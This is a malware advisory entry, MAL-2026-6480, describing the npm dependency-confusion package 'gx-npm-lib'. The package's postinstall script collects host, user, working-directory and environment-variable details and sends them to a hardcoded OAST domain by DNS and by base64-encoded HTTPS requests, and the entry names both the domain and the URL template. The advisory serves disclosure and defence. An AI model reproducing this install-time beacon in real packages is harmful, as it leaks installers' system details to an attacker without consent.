MAL-2026-6480

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (e919710d2f28ec776b8165821ebe2fbe480c1e432ec9416c7b73bd1315ee6a6e) Package published at version 99.99.99 under a generic name (`gx-npm-lib`) — the canonical dependency-confusion shape used to overshadow internal packages in CI version resolution. The `postinstall` lifecycle script runs `node beacon.js`, which collects installer metadata (package name, `os.hostname()`, `os.userInfo()` username, `process.cwd()`, the names of `process.env` variables, and Node version) and exfiltrates it via two channels to the hardcoded attacker-controlled OAST domain `d8uectoqtvskhftsa940pm3kth3ahdxn4.oast.me`: (1) a DNS lookup encoding `pkg.host.user` as subdomains, and (2) a base64-encoded HTTPS GET to `https://d8uectoqtvskhftsa940pm3kth3ahdxn4.oast.me/<pkg>?d=<base64>`. The package self-describes as a 'security-research placeholder' for a dependency-confusion PoC, but that self-label does not constitute installer consent — `npm install` in any environment where this package resolves (CI for an internal `gx-npm-lib`, or a developer mistyping) leaks host/user/cwd/environment inventory to the attacker's OAST collector. Multi-channel (DNS + HTTPS+base64) exfiltration to a hardcoded interactsh-style domain on a default install is a textbook active supply-chain attack.